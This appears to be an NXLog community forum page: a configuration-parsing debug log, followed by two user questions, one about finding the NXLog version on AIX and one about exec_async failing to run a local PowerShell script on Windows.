2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] new regexp: /^</AuditRecord>/
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] regexp declared at line 43, character 34 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] literal
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] parsed expression
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] inputreader 'multiline' registered
2022-08-25 16:12:59 DEBUG [xm_multiline|multiline] Inputreader 'multiline' registered
2022-08-25 16:12:59 DEBUG [xm_xml|_xml] CONFIG: _xml
2022-08-25 16:12:59 DEBUG [im_file|filein] CONFIG: filein
2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [/oraaud/oracle/adump/SVBO/.xml]
2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 56, character 45 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] literal
2022-08-25 16:12:59 DEBUG [im_file|filein] parsed expression
2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [The Raw Event is ]
2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 58, character 37 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] literal
2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_field: raw_event
2022-08-25 16:12:59 DEBUG [im_file|filein] field declared at line 58, character 49 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] binary operation declared at line 58, character 50 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_procedure: log_info
2022-08-25 16:12:59 DEBUG [im_file|filein] global procedure: log_info
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_info (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] log_info declared at line 58, character 51 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] procedure
2022-08-25 16:12:59 DEBUG [im_file|filein] statement: procedure
2022-08-25 16:12:59 DEBUG [im_file|filein] finished parsing statements
2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [The Source Address is ]
2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 59, character 42 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] literal
2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_field: sourceaddr
2022-08-25 16:12:59 DEBUG [im_file|filein] field declared at line 59, character 56 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] binary operation declared at line 59, character 57 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_procedure: log_info
2022-08-25 16:12:59 DEBUG [im_file|filein] global procedure: log_info
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_info (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] log_info declared at line 59, character 58 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] procedure
2022-08-25 16:12:59 DEBUG [im_file|filein] statement: procedure
2022-08-25 16:12:59 DEBUG [im_file|filein] finished parsing statements
2022-08-25 16:12:59 DEBUG [im_file|filein] adding string [The Message is ]
2022-08-25 16:12:59 DEBUG [im_file|filein] string literal declared at line 60, character 35 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] literal
2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_field: Message
2022-08-25 16:12:59 DEBUG [im_file|filein] field declared at line 60, character 46 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] binary operation declared at line 60, character 47 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] nx_expr_new_procedure: log_info
2022-08-25 16:12:59 DEBUG [im_file|filein] global procedure: log_info
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] checking procedure log_info (NULL - NULL)
2022-08-25 16:12:59 DEBUG [im_file|filein] log_info declared at line 60, character 48 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_file|filein] procedure
2022-08-25 16:12:59 DEBUG [im_file|filein] statement: procedure
2022-08-25 16:12:59 DEBUG [im_file|filein] finished parsing statements
2022-08-25 16:12:59 DEBUG [im_fim|fim] CONFIG: fim
2022-08-25 16:12:59 DEBUG [im_fim|fim] adding string [/file/path]
2022-08-25 16:12:59 DEBUG [im_fim|fim] string literal declared at line 67, character 24 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_fim|fim] literal
2022-08-25 16:12:59 DEBUG [im_fim|fim] parsed expression
2022-08-25 16:12:59 DEBUG [im_fim|fim] adding string [.bak]
2022-08-25 16:12:59 DEBUG [im_fim|fim] string literal declared at line 68, character 19 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_fim|fim] literal
2022-08-25 16:12:59 DEBUG [im_fim|fim] parsed expression
2022-08-25 16:12:59 DEBUG [im_fim|fim] adding string [/opt/nxlog/*]
2022-08-25 16:12:59 DEBUG [im_fim|fim] string literal declared at line 69, character 26 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [im_fim|fim] literal
2022-08-25 16:12:59 DEBUG [im_fim|fim] parsed expression
2022-08-25 16:12:59 DEBUG [om_tcp|fileout] CONFIG: fileout
2022-08-25 16:12:59 WARNING [om_tcp|fileout] The 'Port' directive is deprecated in favor of the the new 'host:port' syntax from 'ListenAddr', and will be removed in a future version
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] CONFIG: _fileop
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log]
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 102, character 65 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_function: file_exists
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global function: file_exists
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_exists declared at line 102, character 66 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] new function: file_exists
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log]
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 103, character 64 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_function: file_size
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global function: file_size
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_size declared at line 103, character 65 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] new function: file_size
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal: 5M
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal declared at line 103, character 71 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] binary operation declared at line 103, character 72 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] ( expr:5 )
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] binary operation declared at line 103, character 74 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] ( expr:5 )
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log]
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 105, character 64 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal: 8
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal declared at line 105, character 67 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_procedure: file_cycle
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global procedure: file_cycle
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_info (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_warning (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_error (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_all (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure set_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure sleep (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure drop (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reroute (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_to_route (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure duplicate_guard (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_stop (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_start (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_restart (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure to_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure start_scan (fim - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reconnect (fileout - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_cycle declared at line 105, character 69 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] procedure
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] statement: procedure
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] block declared at line 106, character 13 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] statement: block
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if-else declared at line 106, character 13 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] finished parsing statements
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log]
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 115, character 67 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_function: file_exists
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global function: file_exists
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_exists declared at line 115, character 68 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] new function: file_exists
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] adding string [/opt/nxlog/var/log/nxlog/nxlog.log]
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] string literal declared at line 115, character 116 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal: 8
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] integer literal declared at line 115, character 119 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] literal
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] nx_expr_new_procedure: file_cycle
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] global procedure: file_cycle
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure debug (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_info (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_warning (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure log_error (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_all (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure set_var (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure create_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure delete_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_stat (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure sleep (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure drop (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure rename_field (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reroute (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure add_to_route (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure duplicate_guard (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_stop (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_start (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure module_restart (NULL - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure to_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure parse_windows_eventlog_xml (_xml - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure start_scan (fim - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure reconnect (fileout - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] checking procedure file_cycle (_fileop - NULL)
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] file_cycle declared at line 115, character 121 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] procedure
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] statement: procedure
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if-else declared at line 115, character 121 in /opt/nxlog/etc/nxlog.conf
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] if
2022-08-25 16:12:59 DEBUG [xm_fileop|_fileop] finished parsing statements
2022-08-25 16:12:59 DEBUG [CORE|main] parsing path: filein => fileout
2022-08-25 16:12:59 DEBUG [CORE|main] adding module filein to route parse_xml
2022-08-25 16:12:59 DEBUG [CORE|main] adding module fileout to route parse_xml
2022-08-25 16:12:59 DEBUG [CORE|main] parsing path: fim => fileout
2022-08-25 16:12:59 DEBUG [CORE|main] adding module fim to route 3
2022-08-25 16:12:59 DEBUG [CORE|main] adding module fileout to route 3
2022-08-25 16:12:59 INFO [CORE|main] configuration OK
2022-08-25 16:12:59 DEBUG [CORE|main] nxlog_shutdown() enter
2022-08-25 16:12:59 DEBUG [CORE|main] stopping INPUT modules
2022-08-25 16:12:59 DEBUG [CORE|main] stopping module fim
2022-08-25 16:12:59 DEBUG [CORE|main] stopping module filein
2022-08-25 16:12:59 DEBUG [CORE|main] stopping PROCESSOR modules
2022-08-25 16:12:59 DEBUG [CORE|main] stopping OUTPUT modules
2022-08-25 16:12:59 DEBUG [CORE|main] stopping module fileout
2022-08-25 16:12:59 DEBUG [CORE|main] stopping EXTENSION modules
2022-08-25 16:12:59 DEBUG [CORE|main] stopping module _fileop
2022-08-25 16:12:59 DEBUG [CORE|main] stopping module _xml
2022-08-25 16:12:59 DEBUG [CORE|main] stopping module multiline
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: INPUT
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (filein) : 0x1100f3358
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (fim) : 0x110105a38
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: PROCESSOR
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: OUTPUT
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (fileout) : 0x110118178
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: EXTENSION
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (multiline) : 0x1100ed0b8
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (_xml) : 0x1100f0cf8
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (_fileop) : 0x11012a918
2022-08-25 16:12:59 DEBUG [CORE|main] no entries found, not writing configcache.dat
2022-08-25 16:12:59 DEBUG [CORE|main] nxlog_shutdown() leave
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: INPUT
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: PROCESSOR
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: OUTPUT
2022-08-25 16:12:59 DEBUG [CORE|main] shutdown_modules: EXTENSION
2022-08-25 16:12:59 DEBUG [CORE|main] Module pool FREE (CORE) : 0x10029B78

SISA
Replies: 1
Klevin
NXlog version
Hi Team, Nxlogger is installed on IBM AIX, but I am not able to find the nxlogger version with the commands below.

nxlog -v
nxlog -V

SISA
Replies: 1
Klevin
nxlog-ce-3.0.2284 on Windows, exec_async cannot run a PowerShell or batch script...
Hello! I would like to execute a simple PowerShell script that only creates a folder, on every incoming ERROR message. But it cannot run the PowerShell script! My config file is as follows:

<Input 1>
Module im_tcp
host 0.0.0.0
Port 514
Exec parse_syslog();
</Input>

<Output out>
Module om_file
Module xm_exec
File "C:\\NXlogs\\Test_Log.log"
exec if $raw_event =~ /ERROR/ exec_async("C:\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", "-ExecutionPolicy", "Bypass", "-command", "‪‪C:\\NXlogs\\test.ps1");
</Output>

<Route >
Path 1 => out
</Route>

After running it I got an error message like:

2022-09-07 15:21:22 ERROR subprocess 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe' was terminated by a signal.

Even running notepad.exe or a batch script gives the same error:

ERROR subprocess ................. was terminated by a signal.

Does anyone know what the reason is?

shinee
Replies: 1
shinee